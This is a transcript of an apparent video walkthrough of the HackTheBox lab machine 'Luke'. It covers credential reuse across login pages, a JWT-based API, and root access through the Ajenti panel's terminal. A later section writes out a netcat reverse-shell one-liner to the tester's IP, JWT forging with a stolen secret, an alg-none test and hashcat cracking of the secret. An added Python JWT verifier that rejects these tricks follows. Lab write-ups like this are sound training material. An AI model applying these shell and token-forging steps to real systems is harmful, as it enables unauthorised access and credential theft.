HackTheBox - Luke

IppSec · Intermediate ·🔧 Backend Engineering ·6y ago

Key Takeaways

The video walks through the HackTheBox machine Luke. Recon with nmap finds vsFTPd (with anonymous login), SSH, Apache, a Node.js Express API and the Ajenti control panel; GoBuster turns up the login pages and a config.php with credentials; those credentials are reused across the login pages until a JWT is obtained from the API, the REST API is dumped for more users, and the Ajenti config yields a root login with a built-in terminal. The extra content covers forging JWTs with PyJWT, testing the unsigned (alg none) token, and cracking the signing secret with hashcat.

Full Transcript

What's going on YouTube, this is IppSec and we're doing Luke from HackTheBox. The thing I really liked about this box is that you didn't throw any exploits to do it, and I know that sounds lame, but a lot of pen tests you'll find that you just do recon, find a password in something like GitHub, try that password, log in to something, do more recon, try another password somewhere else, and after a few hops you finally get to what your goal is. That's what this box actually shows. It's gonna be a little bit short, so at the end of the video I'm planning on doing a little bit more, like digging into JWT: we'll go into creating tokens and then probably also brute-forcing them with hashcat or something. So with that being said, let's just jump in.

As always we begin with nmap, so -sC for default scripts, -sV to enumerate versions, -oA to output all formats, putting it in the nmap directory and calling it Luke, and then the IP address, which is 10.10.10.137. It can take some time to run so I've already ran it. Look at the results: there's a handful of ports open. The first one is FTP on port 21 and it's running vsFTPd version 3.0.3. If you did some googling around on this version you'd see it's relatively recent, so probably not worth your time looking into attacks against vsFTPd. That being said, it is configured to allow anonymous FTP logins and is hosting a webapp directory, so we should definitely return to this. The next thing we have is SSH on port 22, and nmap's telling us it's just open and believes this is SSH because the script executions failed. I'm guessing that it just went slow and timed out, so I'm going to start an SSH session to this box just to verify it is SSH listening on port 22; it should give us a login prompt or say something about host keys. The next thing we have is HTTP on port 80. It's running Apache and its host banner is saying it's FreeBSD, so if we have any local file inclusions or code executions we should know that it's FreeBSD, because the commands and file locations are slightly different than on Linux and you can get some, I think, false negatives if you just do Linux commands on FreeBSD. For example, the web directory is generally not going to be in /var/www/html, so keep that in mind as we go on through this box. The next thing we have is port 3000 is open; it's also HTTP and it's telling us it's the Node.js Express framework. And then we have port 8000 open and that's telling us it's the Ajenti HTTP control panel.

So the very first thing we want to do is look at this SSH connection. We see it is prompting us to accept a key, so this is most likely an SSH service. The next thing we want to do is FTP, so I'm just making the FTP directory to stay organized and then do ftp 10.10.10.137. Username is anonymous because anonymous login is allowed; password doesn't matter, I just typed anonymous. Doing dir, we can go into webapp and then there's only one file, it is called for_Chihiro.txt. So I'm going to get this file and then we will look at its contents. Get out of FTP, cat the file, and it's telling us that... it's a message to someone and saying, hey, the guy can give a little push by showing the sources of an actual website you created, normally you should know where to look, but hurry up because I will delete them soon due to security policies. So the note really doesn't help all that much, so let's go over to the actual website.

So 10.10.10.137 is gonna be the HTTP website, then we got 10.10.10.137:3000 for the Node.js, and then we also have 8000 for Ajenti. So let's go open all this... and I messed up on the 8000. So we just get "Welcome to Luke Ltd", a landing page template redesigned for Bootstrap 4, and it's got about, services, contact, and there's nothing too interesting. So I'm just going to launch gobuster. So we'll do gobuster -h... actually I don't have it installed, let's just install this real quick. Now that gobuster is installed we can do -h to see the available modes, and it says there's dir mode for directory/file brute-forcing and DNS mode for subdomains, and then also virtual host. We want to do the directory brute-forcing and then we can do -h to see all the flags. First one is -u for URL, http://10.10.10.137, then -w for wordlist, /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt is what I like using. And before we finish the command, let's just go back here, and if we try like index.php we see it is not found, so if we do index.html, looks like this landing page is HTML. I tried PHP because if we look at the output of nmap we have PHP installed with Apache, so I'm also going to search for PHP scripts with -x php to search all extensions. And then while that gobuster runs we can also test out the port 3000. This is just JSON output, so probably not PHP, and also it said Node.js framework in nmap, so let's just do the same gobuster command except we won't do the extension brute force. So we can copy this, and we probably should do an outfile, so -o, we'll call this gobust-port80-root for root directory, and then we can call this gobust-port3000-root, and we also have to change the URL to be for 3000. So now we got both of those gobusters running.

We have login.php on port 80 and we have /login on port 3000 as well, so I'm gonna go over to CherryTree and do Interesting, and we'll say login pages: port 80, /login.php. Actually I'm just trying to think of a good way to organize this. And then we just have /login on port 3000. Doing things like this just helps you when you start running into roadblocks, being like, oh, there's multiple login page places so I should try them all. We do have member, management, css, js and vendor; they look like they're probably just going to be source directories for random things like JavaScript or CSS files. Then we have config.php, so let's check out member and management. So if we do /member... oh, wrong page. /member, here we just get an open directory. We do /management, we get a login prompt that says forbidden to visitors. Let's just try admin/admin, and we failed. So go back to CherryTree and we have /management port 80 and this will be HTTP auth. So let's go back to the gobust; the next thing is config.php, so let's try config.php. It puts everything on one line because we don't have the HTML for breaks, so I do, I think that was Ctrl+U, yeah, Ctrl+U to view the source and then you get those line breaks. So we do have credentials to MySQL: username root, password is this. So let's copy this. We can do probably a separate page for creds, and then root, that, and we'll say this came from config.php.

So the next thing we want is trying those creds everywhere. So let's go to login.php and... HTTP, no, okay, I just saw that icon, I guess Firefox puts that there when it's port 80, I thought that was like the self-signed cert icon. Try logging in with root and that: incorrect information. We can try admin as well, root and admin are pretty synonymous, and that... /management, root, well again, can't. So if you go to :3000/login we just get JSON saying please authenticate, so there's no real data here to authenticate against, so we have to guess. So let's open up a new panel, we can just do curl for this, and well, first thing I want to do is http://root:password... I don't have my clipboard anymore, creds, copy/paste, okay, @10.10.10.137:3000/login, and we still get please auth, so it's not accepting HTTP authentication. Let's try -d for parameters, and since we're doing it this way let's do a POST request, and normally it's like user=root, or username, and password= the password. We get bad request. Since we don't have line breaks at the end I'm just putting semicolon echo to make it a bit easier to read. We put something that doesn't matter here like please subscribe, we also get bad request. We don't have anything, let's see what we get: bad request. So anything with a POST we're just getting bad request. We try username=root and password=this, which is another common variable for logins, and we get forbidden. So now we know, well, this form probably accepts both username and password in a POST request, it just doesn't accept this as the credentials. So we can try admin/admin and log in with like default creds; doesn't work. We can try admin and then the same password and we get success: authentication successful, and it gives us a big old token.

So then, to clear the screen, this looks like a JWT token. We can verify that by just trying base64 decodes, so we can see algorithm HS256, that's HMAC SHA-256 I believe, type JWT, I think it's JSON Web Token. We can try the next thing, we do echo -n and then base64 -d, and we get username, iat and expiration date. I'm guessing, well, username's easy to guess, iat is probably when it was assigned and expiration is when it expires. And then the very last thing of this JWT token is just a signature, so that's the HMAC thing. So if we do echo -n, base64 -d, we get invalid input. So this whole token... or is it, let's just do this again, we want admin and password like that. So essentially JWT is... oh well, that's going to be horrible. It's broken up into three sections: the very first section is this, and this tells it information about the token, so things like algorithm used for signing. Then the next portion of the token, this is going to be the actual data, and then the final is the signature. So that's the thing about a JWT token, and we got one for the user admin. So generally I would try different attacks, like I'd try to create a token with no signing and see if the web server accepts that, and we'll probably do that at the end of the video. We're not gonna do that now because the token's admin, so why would we bother forging a token if we're already admin? You just have to figure out how to use the token. So let's just do a curl outside of login and then we want to do -H for header, I think it's a capital H, and then put the token, so it's Authorization, token, and then Bearer and then the token name, and we get welcome admin now. So this is just knowing how JWT tokens work, and if you've done Offshore you've probably seen my challenge that involves a JWT token, but I digress, let's just keep on going.

The other things on this, if we go back to gobuster, we have login and users, so let's go to /users, and if we pipe this to jq, which I probably don't have installed right now, so if we install jq and then we'll pipe it over to jq, it'll give us a bit prettier output. You could also go to like Burp probably and install an extension to add headers. So I think if we went to like Burp's Extender, BApp Store, Add Custom Header, and we install this, we probably could do this, so Add Custom Header: Authorization, Bearer, hard coded value like that. And then if we go to the page I think it'll do that, so if we just go to / and then now tell the browser to go through Burp, we can turn intercept off, refresh the page: auth token not supplied. Maybe we have to add this to the scope... yes, auth token not supplied, come on, I told you to add it. So maybe, I don't know how this extension works, I don't use Burp extensions all that much, I thought that would be easy. Let's see if there's any install instructions under Extender, let's see, Add Custom Header, project options, oh, we have to add a session handling rule, duh. So we go to Project options, we can do Session handling rules, Add, and we can call this one add JWT token, the rule action we want to invoke a Burp extension, Add Custom Header, and then in scope we want to change this to use a suite scope. We could do custom scope and specify http://10.10.10.137... whoops, I'll just do suite scope, but in this you can declare the exact scope. So now I'm going to add the JWT token to everything on port 3000. If we refresh the page... we should have been doing that. We go to Target, Scope, we had already configured that, so I'm just going to go back to Project options, we'll edit this, change this to be custom and we'll do http://10.10.10.137 port 3000, okay, parameter scope, that should be fine. Firefox is going through Burp, auth token not supplied, why is this not working? Hard coded value, JWT token... oh, we have to do it with the proxy. So there we go, refresh and we see welcome admin. So it says it doesn't have that as a default because you can do some really bad things with this; for example, if we don't do a scope correctly we could send a JWT token to every single website that we have proxied through, so that's probably why that's not a default option. But happy that works.

Now let's do it the easy way through the command line, because I always prefer the command line. We have jq installed now, so there we go. So we can just do -s for silent to get rid of this little header, and /users gives us a few things. So we can try the standard like API way, maybe users/1 to get information about one... no, users/admin, and we get name and password. So just interacting with generally how REST APIs work; I don't know really how to explain it, look up REST APIs and you'll kind of figure that out. So let's go to Creds and we can do admin, this, and we can just say port 3000. And let's dump all the users, so the next one will be Derry, so Derry, this password, port 3000, then Yuri and then, hold on, Dory as well. So Yuri... and these are all capitals. Usernames generally are not case-sensitive, but I always like being case-sensitive when I don't know the answer. And then Dory, port 3000. So now we have a handful of users so we can try all the logins again. So if we go to /login.php, let's try everything, so admin, paste, Derry, Yuri, and then Dory, and we don't get anything. But this is why you should always take a little good notes, because we also have login on management and we never did Ajenti for 8000. If you went all the way back here we did have username/password, so we probably should have been testing logins there as well, but we forgot to put this in our notes so we didn't do that. Always take good notes.

So let's do management, I have a backslash there but it shouldn't really change anything. Go to creds, do admin: nothing. Derry, well again... and it actually succeeds. And it makes sense, because if we looked at all this up top we have Derry as the web admin, so the web admin can log in. The root user, which is admin, maybe he could log in to Ajenti because he's the root user, so we could also test that: username admin, password is this. We can turn intercept off, I'll probably go up a little bit, try root and that, and nothing. I don't think... yeah, there we go, invalid login. So let's check out what's in /management. There are three files: config.json, config.php and login.php. This JSON has a lot of data, config.php we've already seen, that's the same password, and login.php is this login. So let's take a look at the config.json, and reading through all these variables this is an Ajenti config and we have a password here and it's listening on port 8000. So let's try putting this password in, we'll try admin, paste, and the next one we'll try is root... invalid login; try root and we get in. So first thing we do, go to Creds and we do root, this, and this is Ajenti, found in 80 config.json, there, so we have an idea where it is. And then going through all this there is one interesting thing that is called Terminal, so let's do new terminal, click here, we do whoami, we can see we are root. We go cd /root and then we got root.txt there, so wc -c root.txt and we see 33 characters, which of course is an md5sum and then a line break.

So let's just get a reverse shell real quick so we don't have to use this annoying panel. /dev/tcp, IP is 10.10.14.3 and we always do port 9001, so let's do that and nc -lvnp 9001. Send this command: bad fd number, that's... bash is not found. Let's just make sure I did that bash reverse shell correctly, and it's always possible that it's not working because, well, it is FreeBSD and not Linux. Pentestmonkey, that's the one I want, see, we'll just copy this, go back to Luke, paste, bash -i, I think I did that correctly, 10.10.14.3 9001, yep, I had done that correctly. So let's do which bash... let's see what's a good way to do a reverse shell. Do we have nc? Okay, sh is our shell, which sh, and let's... so we're just /bin/sh. which nc, and we have netcat. So we can try this, where is netcat, one if we have the -e: nc -e, where is sh, sh 10.10.14.3 9001... doesn't look like we have that -e option. We default to this ugly command, and it doesn't... I can't paste in this terminal, which is annoying, so we'll do mkfifo /tmp/f, that worked, f, then sh -i 2>&1 | nc 10.10.14.3 9001, redirect it back to the pipe, and there we go, we got a shell. So python -c import pty, pty.spawn, then sh... which python3, which python, we don't have anything on this box. which script; script -q /dev/null sh, let's try this, stty raw -echo, fg, does not look like that worked. export TERM=xterm, oh well, I can clear the screen. I don't have tab autocomplete, maybe I did that script command wrong, let's see, oh, I have up, let's see, l... okay, .config, okay, I do have tab autocomplete, l just doesn't tab autocomplete to ls, so everything is right in the world. So we got a proper shell on this box.

What else can we do? Let's look at JWT tokens, so let's figure out where the signing key is. So we go cd /, and you can also do like ps -aux I think, yeah, and if you go through all this you can see there is a node app running. You can also do netstat, get the PID and do all that type of stuff, so there's a hundred ways you can find what processes are, but let's just go in nodeapp and config.js. We get the secret is "world is full of developers". So let's go and do a little bit of pen testing on JWT, the extra content. So let's do pip3 install pyjwt to install the JWT library in Python, looks like it is now installed. So we'll do vim please_sub.py, and I also have a Patreon if you want to support me there. So since we have PyJWT we can just do import jwt, and then the way to create a JWT token is jwt.encode and then you give it the contents of what you want. So we wanted username is equal to admin, and then it had an iat, which I think is the assigned time, is equal to, what, 0, and see if this works. And then it also had an expiration date, but let's not put an expiration date. And why would you want to do that? Maybe you want to do persistence, so if you did this, as long as they keep the same key you'll always have a token that works. So the next variable is that, and then the algorithm, that was HS256, and remember we saw that in the very first base64 parameter. So we got the JWT token there; if we print jwt_token, python3 please_sub.py. Let's do jwt_token = jwt_token.decode("utf-8") just to get it so it doesn't treat it as a byte string. So there we go, we got this token. So let's see if the application is going to accept an infinite token. So where is my curl command? curl, it's in terminal 3 which is a netcat session, so let's just redo that: http://10.10.10.137/, -H for header, Authorization: Bearer, paste the token, and we have to specify port 3000, and we get welcome admin. So we could try... let's always do, actually, let's just add it into the script to do this web request. So please_sub, we'll do import requests, and then we'll do headers = Authorization and then an f-string, Bearer {encoded_jwt_token}, okay, so we can print what the token looks like, and then we also want to do r = requests.get and then the URL, and for once I didn't forget the port, headers=headers like that, print r.text. There we go, so now we got the token and the username. So let's try changing the username, let's say create a token with ippsec and go, and we still get welcome admin, so it's just checking if the token is valid. We went to this second piece, we could see this base64 is completely different, so echo -n, base64 -d, we can see the token is like this. It says invalid input because this is URL-encoded base64 I think, which just doesn't do the padding, there we go. So it doesn't do the padding and it changes, I think, plus to... so it changes the characters a little bit and gets rid of the equals padding at the end. But there's that token.

An attack on JWT tokens is, if the application just does like a jwt.decode blindly and doesn't check for keys, sometimes you can log in by just removing the algorithm and forging your token that way. So if we change... before I do that let's just copy the line and comment it out. But if you change the key to None and the algorithm to none, now we're not going to sign the token. So if we don't sign the token what happens? We get a "token is not valid" message, so this time it didn't work. Sometimes you find JWT applications that will still accept that, depending on how the developer has it coded. The final thing we can do, if you want to look at, remember the first block is the header, so if you do echo -n, base64 -d, echo, you can see type is JWT, algorithm is none. The last thing we could do is probably brute force this. So if we go back here and run this and just grab the token, we can go over to hashcat, and Kraken is just a machine I have. I hate doing any type of cracking in a VM, especially on the machine I'm recording from, because it's a CPU-intensive process and all that type of stuff, so I always just remote elsewhere to do cracking. But let's go into the hashcat folder, we can do vim hashes/jwt.luke, paste the token, I'm going to do ./hashcat --example-hashes and then grep -i for JWT, we see it is there. If we do -B4 for before we can see it's mode 16500. So if I now search for 16500, well, we see it doesn't give us an example but it tells us it can crack JSON Web Tokens. So if we do hashcat -m 16500, and before we do that we have to create a password list. So we'll do vim please_support_on_patreon and just create a bunch of passwords, so we'll do test, like a bunch of things, and then one that's "the world is full of developers", and then do hashcat -m 16500 hashes/jwt.luke and then the password file, and then let this run and it should tell us which one is the valid password. If you brute force the secret then you can just forge all the JWT tokens you want and say you're admin anyways. Um, so it did not crack. It's probably my fault, I probably put in there "world is full of developers" and made it like a sentence like that, yep. So there we go, let's run this again, and you saw up top it said it had cracked it. And you can also do, I just recently found out about this, --show, and hashcat will show you the password. So there we go, we have that long hash and then the secret. So that was the box, hope you guys enjoyed it, take care and I'll see you all next week.
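The transcript covers three properties of the JWT in turn: the three dot-separated base64url segments (and why a plain `base64 -d` says "invalid input"), the server rejecting an unsigned alg-none token, and a token with no expiry working forever once the secret is known. The following is an added example, not IppSec's please_sub.py and not code from the Luke box: a standard-library-only HS256 encoder and a verifier that pins the algorithm, checks the HMAC in constant time and requires an `exp` claim, exercised against a valid token, a tampered payload, an alg-none token, an unexpiring token, an expired token and a wrong secret. The secret, claims and timestamps are constructed for the demonstration.

```python
"""Added example (not from the video or the Luke box): minimal HS256 JWT
encode/verify on the Python standard library, showing the three-segment
structure, unpadded base64url, and the checks a verifier must make."""
import base64
import hashlib
import hmac
import json
import time

# Constructed sample secret; a real service keeps this out of source control.
SECRET = b"example-signing-secret"


def b64url_encode(raw: bytes) -> str:
    # JWT uses base64url with the '=' padding stripped, which is why a plain
    # `base64 -d` on a token segment reports "invalid input".
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_hs256(claims: dict, secret: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part).encode()) for part in (header, claims)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now=None) -> dict:
    """Return the claims if the token is valid, otherwise raise ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must have exactly three segments")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    # Pin the algorithm: the token never gets to choose it, so "alg":"none"
    # is rejected before any signature work happens.
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(
        secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
    ).digest()
    # Constant-time comparison of the signature.
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    now = time.time() if now is None else now
    # Require an expiry: a token issued without exp would be valid forever.
    if "exp" not in claims:
        raise ValueError("token has no exp claim")
    if now >= claims["exp"]:
        raise ValueError("token expired")
    return claims


def check(token: str, secret: bytes = SECRET, now: float = 1500) -> str:
    """Summarise a verification attempt as a short string."""
    try:
        return "ok:" + verify_hs256(token, secret, now=now)["username"]
    except ValueError as exc:
        return "rejected:" + str(exc)


def demo() -> dict:
    """Run the verifier over the cases discussed in the video."""
    good = encode_hs256({"username": "admin", "iat": 1000, "exp": 2000}, SECRET)
    header_b64, _payload_b64, sig_b64 = good.split(".")

    # Payload edited to another username but the original signature kept.
    tampered_payload = b64url_encode(
        json.dumps({"username": "ippsec", "iat": 1000, "exp": 2000}).encode()
    )
    tampered = f"{header_b64}.{tampered_payload}.{sig_b64}"

    # Unsigned token: header says alg none, signature segment left empty.
    none_header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    alg_none = f"{none_header}.{tampered_payload}."

    # Signed with the right key but carrying no exp (iat=0 style token).
    no_exp = encode_hs256({"username": "admin", "iat": 0}, SECRET)

    return {
        "valid": check(good),
        "tampered": check(tampered),
        "alg_none": check(alg_none),
        "no_exp": check(no_exp),
        "expired": check(good, now=3000),
        "wrong_secret": check(good, secret=b"other-secret"),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:>13}: {outcome}")
```

The order of the checks matters: the algorithm is pinned from the verifier's configuration rather than read from the token, the signature is compared before any claim is trusted, and a missing `exp` is treated as an error rather than as "never expires".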

Original Description

00:40 - Begin of Recon
02:45 - Checking FTP to get a note
03:38 - Going to each of the three websites
04:30 - Running Gobuster on port 80/3000
06:30 - Taking notes of all the login pages (forgot Ajenti)
07:55 - config.php found which has a password
10:15 - Discovering /login on port 3000 accepts username=&password=
11:25 - Successful login! JWT Token returned
14:00 - Using curl to add the JWT Token in the header to access other api endpoints
15:10 - Using BurpSuite to add headers
18:30 - Navigating the Rest API to dump the usernames and passwords
20:30 - Attempting logins on other services
21:30 - Derry can login to /management
22:50 - Ajenti Password! Let's try logging in
22:30 - Ajenti has a virtual terminal that is running as root!
26:20 - Extra Content - Getting a reverse shell
28:30 - Grabbing the JWT Secret, so we can forge our own tokens!
29:10 - Creating a python script to generate JWT Tokens
30:20 - This token has no expiration time, and is assigned at 0. Should never expire!
31:30 - Adding Requests to our script, so the script can make web requests
33:15 - Let's try removing all signing algorithms from the token and see if server accepts it
34:40 - Cracking the JWT Token Signing key with Hashcat


This video shows how credential reuse across several login pages, a REST API that hands out JSON Web Tokens, and a readable Ajenti config lead to a root terminal on Luke, then uses GoBuster, PyJWT and hashcat along the way. The challenge involves reconnaissance, web application enumeration and JWT handling, including cracking the signing secret.

Key Takeaways
  1. Run nmap (-sC -sV) to enumerate service versions; vsFTPd allows anonymous login and hosts a note
  2. Connect with SSH to verify port 22 is really SSH when nmap's scripts time out
  3. Run GoBuster against ports 80 and 3000 to find the login pages, config.php and the /users API
  4. Use the Burp Add Custom Header extension (with a session handling rule) or curl -H to send the JWT in the Authorization header
  5. Use hashcat mode 16500 to crack the JWT signing secret
💡 The key to solving this challenge is to combine careful note-taking with credential reuse across every login page found, and then to understand how JWT tokens are built, used and verified.

